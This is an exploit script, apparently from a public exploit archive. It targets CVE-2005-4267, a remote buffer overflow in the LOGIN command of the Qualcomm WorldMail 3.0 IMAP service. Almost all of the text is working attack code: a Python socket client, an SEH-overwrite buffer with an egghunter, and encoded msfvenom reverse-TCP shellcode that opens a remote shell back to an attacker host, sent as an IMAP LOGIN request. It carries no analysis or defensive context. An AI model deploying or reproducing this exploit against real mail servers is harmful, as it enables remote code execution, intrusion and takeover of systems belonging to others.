# Exploit Title: Qualcomm WorldMail 3.0 - 'IMAPd' Remote Buffer Overflow in LOGIN command # Buffer overflow in Qualcomm WorldMail 3.0 and earlier allows remote attackers to execute arbitrary code via a long character "}" request in LOGIN. # Exploit Author: Sarang Tumne @SarT # Date: 13th June, 2020 # CVE ID: CVE-2005-4267 # Confirmed on release 3.0 # Vendor: https://www.qualcomm.com/ ############################################### import socket import time a=socket.socket(socket.AF_INET,socket.SOCK_STREAM) a.connect(("192.168.56.112",143)) buffer="A"*687 buffer+="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" buffer+="B"*50 buffer+="\xEB\xb6\x90\x90" #nseh buffer+="\xe7\xb2\x0d\x60" #PPR #buffer+="\x90"*30 buffer+="w00tw00t" buffer+="\x90"*40 buffer+=("\x89\xe1\xdb\xc2\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49" #msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f c -b "\x00\x0a\x0d" EXITFUNC=seh -e x86/alpha_mixed "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x6b\x4c\x48\x68\x6c\x42\x35\x50\x65\x50\x53\x30\x75\x30\x4c" "\x49\x6a\x45\x46\x51\x39\x50\x55\x34\x6e\x6b\x56\x30\x50\x30" "\x4c\x4b\x50\x52\x66\x6c\x4e\x6b\x32\x72\x76\x74\x4c\x4b\x31" "\x62\x67\x58\x64\x4f\x78\x37\x42\x6a\x51\x36\x75\x61\x59\x6f" "\x6e\x4c\x45\x6c\x65\x31\x53\x4c\x54\x42\x54\x6c\x37\x50\x4f" "\x31\x48\x4f\x34\x4d\x55\x51\x39\x57\x38\x62\x4a\x52\x53\x62" "\x53\x67\x6c\x4b\x56\x32\x72\x30\x4c\x4b\x31\x5a\x77\x4c\x4e" "\x6b\x30\x4c\x67\x61\x34\x38\x4d\x33\x47\x38\x37\x71\x6e\x31" "\x33\x61\x6c\x4b\x73\x69\x61\x30\x56\x61\x69\x43\x4e\x6b\x47" "\x39\x44\x58\x49\x73\x77\x4a\x50\x49\x6c\x4b\x64\x74\x4c\x4b" "\x77\x71\x39\x46\x75\x61\x69\x6f\x6c\x6c\x7a\x61\x68\x4f\x54" "\x4d\x55\x51\x78\x47\x37\x48\x39\x70\x71\x65\x4c\x36\x75\x53" "\x73\x4d\x78\x78\x47\x4b\x33\x4d\x44\x64\x61\x65\x58\x64\x51" "\x48\x4e\x6b\x70\x58\x74\x64\x55\x51\x79\x43\x70\x66\x6c\x4b" "\x64\x4c\x52\x6b\x4c\x4b\x30\x58\x77\x6c\x55\x51\x6b\x63\x6c" "\x4b\x36\x64\x6e\x6b\x36\x61\x68\x50\x4f\x79\x63\x74\x67\x54" "\x61\x34\x51\x4b\x61\x4b\x50\x61\x70\x59\x63\x6a\x36\x31\x79" "\x6f\x59\x70\x63\x6f\x63\x6f\x52\x7a\x6e\x6b\x72\x32\x6a\x4b" "\x6c\x4d\x63\x6d\x43\x58\x74\x73\x47\x42\x67\x70\x37\x70\x72" "\x48\x44\x37\x30\x73\x76\x52\x61\x4f\x33\x64\x55\x38\x42\x6c" "\x53\x47\x56\x46\x37\x77\x4b\x4f\x5a\x75\x68\x38\x6c\x50\x46" "\x61\x35\x50\x57\x70\x56\x49\x39\x54\x32\x74\x46\x30\x43\x58" "\x46\x49\x4f\x70\x32\x4b\x47\x70\x49\x6f\x69\x45\x62\x70\x32" "\x70\x70\x50\x72\x70\x71\x50\x62\x70\x67\x30\x42\x70\x51\x78" "\x5a\x4a\x74\x4f\x39\x4f\x6d\x30\x59\x6f\x69\x45\x4a\x37\x53" "\x5a\x44\x45\x33\x58\x49\x50\x6c\x68\x55\x68\x50\x6c\x52\x48" "\x34\x42\x45\x50\x62\x31\x71\x4c\x6c\x49\x48\x66\x43\x5a\x74" "\x50\x61\x46\x52\x77\x61\x78\x6c\x59\x4c\x65\x33\x44\x51\x71" "\x49\x6f\x48\x55\x4e\x65\x49\x50\x71\x64\x76\x6c\x4b\x4f\x32" "\x6e\x45\x58\x54\x35\x78\x6c\x70\x68\x6c\x30\x38\x35\x59\x32" "\x61\x46\x6b\x4f\x79\x45\x72\x48\x52\x43\x42\x4d\x32\x44\x55" "\x50\x6d\x59\x6a\x43\x42\x77\x32\x77\x32\x77\x75\x61\x48\x76" "\x42\x4a\x72\x32\x42\x79\x73\x66\x68\x62\x49\x6d\x35\x36\x4a" "\x67\x31\x54\x77\x54\x75\x6c\x46\x61\x37\x71\x4c\x4d\x53\x74" "\x47\x54\x56\x70\x38\x46\x35\x50\x57\x34\x63\x64\x56\x30\x51" "\x46\x53\x66\x42\x76\x77\x36\x36\x36\x30\x4e\x46\x36\x51\x46" "\x51\x43\x51\x46\x45\x38\x62\x59\x78\x4c\x75\x6f\x4e\x66\x79" "\x6f\x4b\x65\x4c\x49\x49\x70\x30\x4e\x76\x36\x62\x66\x6b\x4f" "\x74\x70\x42\x48\x63\x38\x4e\x67\x47\x6d\x63\x50\x79\x6f\x4e" "\x35\x6f\x4b\x49\x6e\x56\x6e\x54\x72\x48\x6a\x72\x48\x49\x36" "\x6e\x75\x4d\x6d\x4d\x4d\x39\x6f\x4e\x35\x75\x6c\x63\x36\x63" "\x4c\x46\x6a\x6b\x30\x59\x6b\x69\x70\x43\x45\x36\x65\x4d\x6b" "\x51\x57\x52\x33\x64\x32\x72\x4f\x70\x6a\x45\x50\x33\x63\x39" "\x6f\x4a\x75\x41\x41") #buffer+="\x90"*40 junk=("}")*300 #buffer+="B"*4 #buffer+="C"*500 a.send("A001 LOGIN "+buffer+junk+"\r\n") print a.recv(50000) a.close()